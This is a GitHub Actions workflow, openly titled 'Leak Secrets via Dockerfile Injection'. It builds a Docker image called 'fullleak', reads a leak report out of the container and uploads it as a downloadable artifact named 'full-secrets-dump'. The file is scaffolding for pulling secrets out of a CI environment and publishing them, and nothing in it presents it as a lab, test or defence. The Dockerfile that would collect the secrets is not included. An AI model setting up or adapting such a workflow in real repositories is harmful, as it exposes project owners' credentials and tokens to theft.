name: Leak Secrets via Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  leak:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Build Docker image
        run: |
          docker build -t fullleak .

      - name: Run container and extract secrets
        run: |
          docker run --rm fullleak cat /leak_report.txt > full_report.txt

      - name: Upload secret report
        uses: actions/upload-artifact@v3
        with:
          name: full-secrets-dump
          path: full_report.txt
